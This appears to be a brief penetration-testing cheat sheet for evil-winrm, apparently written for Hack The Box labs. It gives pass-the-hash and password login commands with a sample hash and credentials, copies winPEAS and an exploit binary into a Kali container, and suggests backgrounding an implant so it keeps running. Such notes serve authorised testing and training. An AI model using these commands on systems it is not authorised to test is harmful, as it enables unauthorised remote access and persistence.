evil-winrm
evil-winrmis used to take advantage of machines with port 5985 or 5986 open which is Powershell Remoting.This will provide shell level access to the machine with the user account that you have compromised.
You can auth either with a hash or password
Supports SSL
Usage
Connect with pass the hash attack
evil-winrm -i 10.10.100.15 -u administrator -H "c2597747aa5e43022a3a3049a3c3b09d"Password Authentication:
evil-winrm -i 10.10.100.15 -u a-whitehat -p "bNdKVkjv3RR9ht"evil-winrm Docker
I have had issues with
evil-winrmrunning properly on non kali Linux distros such as Ubuntu.One simple work around is to pull a Kali Docker image and utilize that
docker pull kalilinux/kali-rolling
sudo docker run --tty --interactive kalilinux/kali-rolling
evil-winrm -i 172.16.2.5 -u 'DANTE.ADMIN\jbercov' -p mypass123copy files from host into evil-winrm docker container
sudo docker cp /opt/winPEASx64.exe 3faed2add6c3:/opt
docker cp /home/ubuntu/Documents/htb/cicada/exploit/cicada.htb.exe bbf6c66e54c3:/optevil-winrm Service enumeration
you can use a builtin from evil-winrm to enumerate services on a remote endpoint
evil-winrm file upload
use the builtin for evil-winrm to upload files from your attackbox to the remote host
WinRM Implant Execution
start your implant in the background so if your evil-winrm shell dies your implant will continue to run
Last updated